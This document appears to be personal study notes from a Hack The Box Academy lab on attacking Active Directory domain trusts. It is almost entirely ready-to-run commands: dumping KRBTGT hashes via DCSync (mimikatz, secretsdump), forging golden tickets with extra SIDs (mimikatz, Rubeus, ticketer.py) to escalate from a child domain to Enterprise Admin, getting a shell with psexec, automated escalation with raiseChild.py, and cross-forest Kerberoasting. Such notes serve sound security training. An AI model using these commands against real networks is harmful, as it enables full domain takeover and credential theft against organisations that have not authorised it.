# Domain Trust Enumeration ## Enumerate Domain Trusts (PowerView) ### Show Existing Trusts ```powershell Get-Domaintrust ``` ### Show Trust Mapping ```powershell Get-DomainTrustMapping ``` ### Show Users in the Child Domain ```powershell Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName ``` ## Attacking Domain Trusts - Child -> Parent (Windows) To perform this attack after compromising a child domain, we need the following: 1. The KRBTGT hash for the child domain 2. The SID for the child domain 3. The name of a target user in the child domain (does not need to exist!) 4. The FQDN of the child domain. 5. The SID of the Enterprise Admins group of the root domain. 6. With this data collected, the attack can be performed with Mimikatz. ### 1 Obtaining KRBTGT NT Hash ```powershell mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt ``` ### 2 Obtaining SID Child Domain ```powershell Get-DomainSID ``` ### 3 Name Target User ```powershell # Can be a fake usernamr ``` ### 4 FQDN Child Domain ```powershell Get-Domaintrust ``` ### 5 SID Enterprise Admins Group ```powershell Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid ``` ### 6 Putting It All Together ```powershell # Mimikatz Way kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt # Rubeus Way \Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt ``` ### 7 Confirm Ticket ```powershell # List Tickets klist ``` ### 8 DCsync ```powershell # Mimikatz lsadump::dcsync ``` ## Attacking Domain Trusts - Child -> Parent (Linux) We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information: 1. The KRBTGT hash for the child domain 2. The SID for the child domain 3. The name of a target user in the child domain (does not need to exist!) 4. The FQDN of the child domain 5. The SID of the Enterprise Admins group of the root domain #### 1 Get KRBTGT NT Hash ```bash secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt ``` #### 2 Get SID Child Domain ```bash lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" ``` #### 3 Name Target User ```powershell Can be any name ``` #### 4 Get SID Enterprise Admins ```bash lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins" ``` #### 5 Putting it all Together ```bash ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker ``` #### 6 Export ccache ```bash export KRB5CCNAME=hacker.ccache ``` #### 7 Get Shell ```bash psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 ``` ### Automatic Way ```bash raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm ``` ## Attacking Domain Trust - Cross-Forest (Windows) ### Cross-Forest Kerberoasting ```powershell # Enumerate Cross Forest Users with SPN Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName # Rubeus /Domain flag .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap ``` ### Admin Password Reuse & Group Membership ```powershell # Check Foreign Groups Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL # Convert SID Convert-SidToName # Login, if we are part of the administrators group Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator ``` ### SID History Abuse !\[\[Pasted image 20230428181936.png]] ## Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux) ### Cross-Forest Kerberosting ```bash # Using -target-domain GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley ```